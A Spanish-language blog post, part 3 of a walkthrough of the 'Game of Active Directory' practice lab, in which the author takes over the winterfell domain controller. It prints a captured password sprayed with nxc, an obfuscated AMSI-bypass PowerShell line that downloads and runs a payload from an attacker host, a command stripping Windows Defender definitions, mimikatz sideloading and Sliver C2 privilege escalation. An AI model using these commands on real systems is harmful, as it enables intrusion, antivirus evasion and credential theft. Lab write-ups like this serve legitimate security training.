Ximo Baeza

Ximo Baeza

Entusiasta del software libre y la ciberseguridad

Game of Active Directory - Parte 3

En la segunda parte conseguimos acceder a la máquina castelblack para después elevar privilegios gracias al privilegio seimpersonateprivilege. En esta tercera parte accederemos al controlador de dominio de north.sevenkingdoms.local.

En la segunda parte conseguimos varias credenciales, en concreto nos interesa la que obtuvimos con el responder robb.stark:sexywolfy.

Vamos a probar esas credenciales en todas las máquinas para ver en cuales nos podemos autenticar.

nxc smb 192.168.56.10-23 -u robb.stark -p sexywolfy

Y vemos que tenemos permisos de administrador en el controlador de dominio winterfell. Y además podemos iniciar sesión a través de winrm.

evil-winrm -u robb.stark -p sexywolfy -i 192.168.56.11

Ahora vamos a obtener un beacon de sliver para tener las sesiones de las dos máquinas en el C2.

Desde la sesión que tenemos con evil-winrm ejecutamos el primer comando que utilizamos en la webshell y obtenemos el beacon sin que el defender se entere.

$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344);IEX (new-object system.net.webclient).downloadstring('http://192.168.56.1:9000/sc.txt')

Y ya que tenemos permisos de administrador vamos a dejar fuera de la ecuación al defender. Mi método favorito es eliminar sus definiciones, de esta forma seguirá activado pero a efectos prácticos será como si no estuviera.

execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

En este punto, teniendo el AV sin definiciones, podríamos ejecutar mimikatz o cualquier cosa que no nos va a detectar.

sideload /opt/resources/windows/mimikatz/x64/mimikatz.exe "coffee" "exit"

Ahora nos basta con ejecutar getsystem desde sliver para obtener un nuevo beacon de system. Lo utilizamos y interactuamos con él para recibir la sesión de system en el controlador de dominio.

Ya somos system en el primer controlador de dominio (winterfell.north.sevenkingdoms.local), en la cuarta parte empezaremos a atacar el segundo dominio (essos.local).

Puede que también te interese

Reflection Vulnlab Chain

En este artículo vamos a resolver el laboratorio Reflection de la plataforma Vulnlab. Para ello haremos cosas tan chulas como un relay de credenciales desde un mssqlclient, o una explotación de rbcd teniendo el machine account quota a cero.

Game of Active Directory - Parte 6

En esta sexta parte vamos a atacar el servidor kingslanding.sevenkingdoms.local, que es el controlador de dominio de sevenkingdoms.local. Nos aprovecharemos de la relación de confianza bidireccional que tiene con el dominio essos.local que, en este caso está configurado con la opción sid-history. Esto nos permitirá crear un golden ticket con acceso total al dominio sevenkingdoms.local y podremos hacer un dcsync obteniendo el hash del administrador.

Game of Active Directory - Parte 5

En esta quinta parte vamos a atacar el controlador de dominio meereen.essos.local. Tras una enumeración del servicio web en braavos.essos.local descubriremos que dispone del rol ADCS. Veremos que es vulnerable y utilizaremos certipy para obtener la cuenta del administrador de dominio en meereen.essos.local. Por último lo conectaremos al command and control Sliver utilizando el archivo generado en el anterior artículo, aprovechando que está preparado para evadir el defender.

Game of Active Directory - Parte 4

En esta cuarta parte vamos a atacar el dominio essos.local. Conseguiremos credenciales con asreproasting, para luego ver con bloodhound que tenemos el rol GenericAll sobre otra cuenta, y nos aprovecharemos de eso para escalar privilegios. Finalmente obtendremos un beacon de sliver evadiendo el defender.